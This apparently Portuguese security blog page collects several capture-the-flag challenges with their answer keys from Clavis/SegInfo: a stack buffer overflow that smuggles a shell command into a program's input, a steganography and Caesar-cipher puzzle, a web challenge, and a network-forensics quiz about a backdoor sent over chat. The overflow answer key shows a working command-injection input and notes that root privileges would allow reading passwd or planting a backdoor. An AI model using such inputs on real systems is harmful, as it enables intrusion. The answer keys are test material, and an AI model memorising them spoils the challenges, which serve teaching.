Blog SegInfo – Segurança da Informação – Tecnologia – Notícias, Artigos e Novidades

Revelaremos agora a resposta do último Desafio SegInfo, publicado em 14 de março aqui no blog.

Primeiramente vamos verificar a forma como o binário age normalmente:

clavis@clavis:~$ ./vuln
Qual seu nome?[Ate 30 caracteres] clavis
Ola clavis
clavis@clavis:~$

Verificar o funcionamento do programa quando inserimos mais de 30 caracteres:

clavis@clavis:~$ ./vuln
Qual seu nome?[Ate 30 caracteres]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Ola AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA // 34 A's
clavis@clavis:~$

Ainda funciona =/

Testando 40 A’s:

clavis@clavis:~$./vuln
Qual seu nome?[Ate 30 caracteres]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
clavis@clavis:~$

Algo de errado aconteceu!

Entendendo a pilha

Em programação uma pilha é uma estrutura que armazena os dados de forma que o último que entra é o primeiro que sai. A forma mais simples de entender a pilha é pensar num pino de CDs ou DVDs gravados: se você colocar um CD gravado num pino vazio, e depois colocar outro por cima, o primeiro que você pegar vai ser o que você colocou por último; se você quiser pegar o de baixo, vai precisar primeiro tirar o de cima para só então poder acessar o de baixo.

Comumente, as variáveis tem um espaço limitado alocado para elas, sendo assim, podemos inserir apenas o número de caracteres limitados ao espaço das mesmas. Porém em linguagens como C que manipulam diretamente a memória existem funções que, quando usadas, se não fizermos o devido controle, permitem que passemos do limite, podendo inclusive mudar valores de variáveis/registradores adjacentes na pilha gerando um transbordamento na pilha ou fazendo um overflow.

Ex: Se inserirmos 30 caracteres em uma variável que em tese deveria aceitar somente 26, estamos lotando a memória destinada à variável e alocando o restante em algum outro lugar (neste caso, na variável adjacente).

Como podemos explorar isso?

Tendo em vista o funcionamento da pilha e que outras variáveis podem ter sido inseridas antes da que estamos manipulando, após um overflow, nossa pilha ficaria da seguinte forma:

--------------   <- topo da pilha
| AAAAAAAAAA |   <- variável 1 (cheia)
| AAAAAAAAAA |
| AAAAAAAAAA |
--------------
| AAAAAAAAAA |   <- variável 2 (contendo o que transbordou da variável 1)
--------------
       .
       .
       .
--------------   <- base da pilha

Vale ressaltar que existe um pequeno espaço entre os dados de uma variável e outra, sendo assim, é necessário um pouco mais que 30 caracteres para chegarmos ao nosso objetivo.

Como vimos anteriormente, com 34 A’s nosso programas funciona, porem com 40 não funciona mais, sendo assim, a nossa abordagem consistirá em adicionar o comando pwd (ou algum outro de sua escolha) ao final da nossa entrada maliciosa afim de alocá-lo em outra variável e ver como o programa se porta:

Testando: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApwd (36 A’s seguidos do pwd)

clavis@clavis:~$./vuln
Qual seu nome?[Ate 30 caracteres]AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApwd
Ola AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApwd
clavis@clavis:~$

Sem sucesso, mas não desista!

Ao tentarmos a entrada: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApwd (40 A’s seguido do pwd) obteremos o seguinte resultado:

clavis@clavis:~$./vuln
Qual seu nome?[Ate 30 caracteres]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApwd
/home/clavis

Outra dica seria observar que um arquivo chamado “nada” é criado com erros do tipo:

sh: aaaaaaaaaaaaaaaaaaaaa: not found

e daí calcular quantos “a’s” precisamos escrever a menos de forma que o “pwd” seja alocado corretamente.

Note que, caso o dono deste programa fosse um usuário com privilégio de root no sistema, poderíamos executar vários comandos interessantes, como listar o passwd e até adicionar um backdoor.

Esta técnica é chamada de fuzzing e consiste em injetar strings aleatórias na aplicação até que obtenhamos uma resposta anormal, daí o desenvolvedor de exploits buscará desviar o fluxo do programa para obter um shell ou alguma outra ação maliciosa, nem sempre sendo necessária uma outra variável acima destas, mas este tema será abordado em um post futuro.

É isso pessoal, até o próximo desafio! (:

Mais informações em http://insecure.org/stf/smashstack.html

O Blog SegInfo traz mais um desafio esta semana para ser resolvido pelos nossos leitores. Para tal serão necessários conhecimentos sobre: Buffer overflow, Fuzzing e um pouco de programação. Abaixo estão as instruções necessárias.

Restrição
Devido ao sistema para o qual foi compilado (Linux 32 bits), este binário só poderá ser executado corretamente em máquinas Linux. Aos que não possuem, recomendamos que a análise de qualquer software estranho seja feita em ambiente seguro e controlado como uma máquina virtual.

Descrição do jogo
Este binário aparentemente inofensivo imprime uma mensagem de olá para o usuário, no entanto ele possui uma vulnerabilidade conhecida e cabe a você, caro leitor, explorá-la.

Seu Objetivo
Baixe o arquivo vuln.zip (soma MD5: 2f9d6fe4ddaf983b1e95c36339ef9ee8) e extraia seu conteúdo (com o comando unzip vuln.zip na pasta em que o arquivo foi baixado, por exemplo); a seguir, descubra uma forma de executar um comando arbitrário explorando uma falha neste executável.

Boa sorte a todos os participantes! E fiquem sempre ligados no @SegInfo, pois em alguns dias publicaremos o gabarito detalhado deste desafio. Enquanto isso, confira o primeiro desafio, de Análise Forense em Tráfego de Rede (gabarito), o segundo desafio, Programação Web (gabarito) e o terceiro desafio, de Esteganografia (gabarito). Até lá!

Revelaremos agora a resposta do último desafio SegInfo, publicado em 24 de janeiro aqui no blog. Segue um procedimento correto para chegar à solução.

0. Após baixar a imagem, vamos conferir a sua MD5 para confirmar que não houve nenhuma falha na transmissão:

$ md5sum DesafioEsteg.jpg
a5d78511149bcf68afddd82a1ed6db29  DesafioEsteg.jpg

1. Com a imagem em mãos, vamos analisar o tipo do arquivo:

$ file DesafioEsteg.jpg
DesafioEsteg.jpg: JPEG image data, JFIF standard 1.02

2. Vamos verificar se por acaso não existem strings escondidas na imagem antes de tentar usar um programa:

$ strings DesafioEsteg.jpg
0101011001010111010110100011001101011010011011010110011001000100011100010101100
0010011100011010001001001010010000101011000110000011001000111100101000010001100
1101100001011011100110100000110000011000110101011101000110011100010110010001111
0010100001000110000010010010100011101101100011100010110010101000111010110100111
0010011000100110111001010001011001110110000101010111010110010110011101010011010
0100001000110011011010101100101010111001101010011010001001001010001100110100001
1100010110001001001000011100000011001101011010011011100101000001000100011100000
0110010010110010110011101100001010101110101100101100111010101000110111001001110
0111001001100100010010000110010001111001010110100111001101001111011011100111011
1001101100100111000110000010011000110100101000010010010010110010001001000010011
1001110100011000010111001101001111011011100101101001101001010000100111101001100
1000100100001101000001101000101101001101001010000100100110001100100010010000110
0100011110010101101001110011010011110110111001110111001101100100111000110000010
0100101000111011011000111000101001001010001010101101000110110011000010101011100
1101010011010101100100010010000110001101100111011000010110111001001001011001110
1010111010101110111000000110100011001010101011101101111011001110110000101010111
0110111101100111010101000110111001001110011010000101101001101110011010100100010
0011011110011001101010001011001110110000101101110010010010110011101100010010110
0001101100001101010110010001010100011011110111011001001100001100100100101001101
0010101100101101001001101010110111001100011010110000101001001110011010011000110
1101011010000111100001011010011011010100011001110101011001010100001100110101011
0111101100100010010000100100101110101010110100011001101100011011101100110000100
1100110101001000110011011000110110110101011010011011110101101001101110010100010
1110100011000010101011101101111011101000100111001111010011001110111010001100010
0101100001010010001100110101101001101110011001110111010001011010011011100111000
0011100000110001001101110011011000011000001100100011110010011000101110001011000
1101101001001100010011010101100001011011100110100000110101011000010110100100110
0010111000001100001011010010011000101110101011000110011001001000110011011010110
0101010001110101101000110000010011000101011101011010011011110101101001101101011
0110001110001011000110110110100110101011011010100110001010111011010000111100001
0110100110110101000110011101010110010101000011001100010011010001100001011011010
1111000001101100110010000110010010110100111101001100001010001110101100101110100
0110000101010111010110010111010001100010011011100100111001110010011001000100100
0011001000111100101011010011011010110100001101101011001000100000101101111001111
01

3. Como a mensagem está em binário, precisamos convertê-la para ASCII, para isso você pode usar o Binary to Text (ASCII) Conversion. (Questão Bônus: Como fazer isso sem sair do shell?)

VWZ3ZmfDqXN4IHV0dyB3anh0cWFqdyB0IGlqeGZrbnQgaWYgSHFmYW54IFhqbHp3ZnPDp2Yga
WYgTnNrdHdyZsOnw6N0LiBIdHNtasOnZiBzdHh4ZiBLdHdyZsOnw6N0IGlqIEZ6aW55dHcganIgWWp4
eWogaWogTnNhZnjDo3QganIgbXl5dTovL2JiYi5ncXRsLmhxZmFueC5odHIuZ3cva3R3cmZoZnQtaWo
tNzgtbXR3ZngtZnppbnl0dy1qci15anh5ai1pai1uc2FmeGZ0LWZoZmlqcm5mLWhxZmFueC14amx6d2
ZzaGYtaWYtbnNrdHdyZmhmdAo=

4. Agora decodificamos a mensagem de base64:

echo "VWZ3ZmfDqXN4IHV0dyB3anh0cWFqdyB0IGlqeGZrbnQgaWYgSHFmYW54IFhqbHp3ZnPD
p2YgaWYgTnNrdHdyZsOnw6N0LiBIdHNtasOnZiBzdHh4ZiBLdHdyZsOnw6N0IGlqIEZ6aW55dHcganI
gWWp4eWogaWogTnNhZnjDo3QganIgbXl5dTovL2JiYi5ncXRsLmhxZmFueC5odHIuZ3cva3R3cmZoZn
QtaWotNzgtbXR3ZngtZnppbnl0dy1qci15anh5ai1pai1uc2FmeGZ0LWZoZmlqcm5mLWhxZmFueC14a
mx6d2ZzaGYtaWYtbnNrdHdyZmhmdAo=" | base64 -d
Ufwfgésx utw wjxtqajw t ijxfknt if Hqfanx Xjlzwfsçf if Nsktwrfçãt. Htsmjçf
stxxf Ktwrfçãt ij Fzinytw jr Yjxyj ij Nsafxãt jr myyu://bbb.gqtl.hqfanx.htr.
gw/ktwrfhft-ij-78-mtwfx-fzinytw-jr-yjxyj-ij-nsafxft-fhfijrnf-hqfanx-xjlzwfshf-
if-nsktwrfhft

5. Por fim, seguindo a dica da foto (salada caesar), vemos que o texto está cifrado usando a Cifra de Caesar, com chave de deslocamento de valor 5. Para cada letra (exceto as acentuadas), substitua pela quinta letra anterior (valor ASCII menos 5). Você pode usar o cipher.py para ler a mensagem:

"Parabéns por resolver o desafio da Clavis Segurança da Informação. Conheça nossa Formação de Auditor em Teste de Invasão em http://www.blog.clavis.com.br/formacao-de-78-horas-auditor-em-teste-de-invasao-academia-clavis-seguranca-da-informacao"

Trazemos ao leitor do blog mais um desafio a ser resolvido. Para este desafio serão necessárias habilidades de esteganografia,  criptoanálise e raciocínio lógico. Abaixo estão as instruções necessárias:

Descrição do jogo:

A imagem desta saborosa salada contém uma mensagem escondida e protegida por criptografia. A dica está implícita no desafio.

Seu objetivo:

Baixe a imagem JPEG a seguir (MD5: a5d78511149bcf68afddd82a1ed6db29) e faça uma análise de esteganografia e criptoanálise para descobrir a mensagem original escondida na figura.

Conhecimentos requeridos:

• Criptoanálise
• Esteganografia

Boa sorte a todos os participantes! E fiquem sempre ligados no @SegInfo, em alguns dias publicaremos o gabarito detalhado deste desafio. Enquanto isso, confira o primeiro desafio, de Análise Forense em Tráfego de Rede (gabarito) e o segundo desafio, Programação Web (gabarito). Até lá!

Por: Clavis Segurança da Informação

O cenário do jogo é baseado em uma equipe de desenvolvedores web que está construindo uma nova página para o seu site, e para isso modificou a página principal atual, inserindo nela um contador regressivo com o tempo de 24 horas. Ao término das 24 horas, todos os usuários serão redirecionados para o novo site.

Descompacte o arquivo desafio-seginfo.zip,
(md5:e0c35e717a776ee4ac53e68a0274e895), e abra a página index.html. Após isso o contador será inciado e seu objetivo é conseguir acesso à nova página antes que o tempo acabe e o redirecionamento aconteça automaticamente.

Microsoft Windows [versão 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Todos os direitos reservados.

1. Qual nick Rafael utilizou para se passar pelo neto de Filipe?

R: Guilherme Portão

2. Qual foi o primeiro cometário na conversa entre os dois?

R: Olá vovô, estou com muita saudade do senhor e de seus pães deliciosos…

3. Qual o nome do arquivo que foi transferido durante a conversa?

R: simulador-padaria.exe (base64)

4. O que aconteceu após a transmissão de tal arquivo?

R: Rafael conseguiu acesso remoto na máquina de Filipe a partir do arquivo enviado (backdoor).

5. Onde Rafael encontrou o arquivo que contém a receita secreta?

R: C:/Receitas/Secretas/

6. Qual é a receita secreta?

R: 

* Ingredientes:

 

½ quilo de farinha de trigo 

15 g de fermento para pão 

15 g de sal 

20 g de açúcar 

1 colher (sopa) se margarina

Acompanhe as novas receitas no Twitter

Conheça a nossa página no Facebook

* Modo de preparo:

 

Dilua o fermento em um copo de água morna com o açúcar.

Misture os outros ingredientes.

Amassa e levante, empurrando a massa para frente, com a palma da mão e dobrando-a sobre si mesma.

Se for necessário, coloque mais água e mais farinha.

A massa não deverá grudar nas mãos.

Deve ficar com aspecto leve e esponjoso.

Deixe descansar por duas horas.

A seguir, amasse novamente e prepare o pão, dando-lhe o formato desejado e coloque no tabuleiro untado.

Se estiver pegajosa, espalhe mais farinha por cima.

Deixe que ela descanse mais uma hora.

Aqueça o forno e pincele o pão com água antes de colocá-lo no forno.

Assar por 40 minutos mais ou menos.

Rendimento: 20 porções 

Tempo: 150 minutos 

No dia 13 de agosto de 2011, em paralelo às palestras do evento Workshop SegInfo de Segurança da Informação, aconteceu a primeira classificatória da segunda edição do War Games SegInfo. Foram classificados 4 participantes nessa etapa. Outro participante foi classificado pelo War Games Online, realizado pela Clavis. No total foram 5 classificados para a final que aconteceu em setembro de 2011, em conjunto com um dos maiores eventos de TI e negócios do Brasil, o Rio Info 2011. Evento dedicado à Tecnologia da Informação (TI) e realizado anualmente no Estado do Rio de Janeiro, reúne empresários, acadêmicos e profissionais que buscam novas oportunidades de mercado e realizam negócios.

Para o Rio Info 2011 foram criados 2 jogos. Um deles consistiu em uma Análise Forense em tráfego de rede, onde havia uma série de perguntas relacionadas a um arquivo entregue aos competidores. Já o outro jogo foi um ambiente com diversas máquinas virtuais e vulnerabilidades previstas onde os participantes deveriam comprometer as máquinas e por fim gerar um relatório de todas as deficiências do ambiente testado, similar a um Teste de Invasão.

Agora você, leitor do SegInfo, tem a oportunidade de tentar solucionar o mesmo desafio de Análise Forense proposto pela Clavis Segurança da Infomação no Rio Info 2011!

Veja abaixo todas as informações sobre o desafio:

Descrição do jogo:

Filipe é dono de uma padaria e possui uma receita incrível para fazer seus pães, onde todos em sua cidade adoram. Mas Rafael que é um concorrente deseja obter essa receita, e para isso fingiu ser o neto de Filipe para obter a receita secreta.
Alguns dias após o ocorrido descobriram o que Rafael havia feito, e por sinal encontraram um arquivo:
“padaria.pcap (md5:9c546f3e88828c6d3182fcd25f5304b2)”
dentro de seu computador, mas não foram capazes de identificar o que de fato aconteceu.

Você é um perito e seu objetivo é descobrir como Rafael fez isso!

Perguntas:

1. Qual nick Rafael utilizou para se passar pelo neto de Filipe?
2. Qual foi o primeiro cometário na conversa entre os dois?
3. Qual o nome do arquivo que foi transferido durante a conversa?
4. O que aconteceu após a transmissão de tal arquivo?
5. Onde Rafael encontrou o arquivo que contém a receita secreta?
6. Qual é a receita secreta?

Todas as respostas para esse desafio serão divulgadas na próxima semana. Boa diversão! (: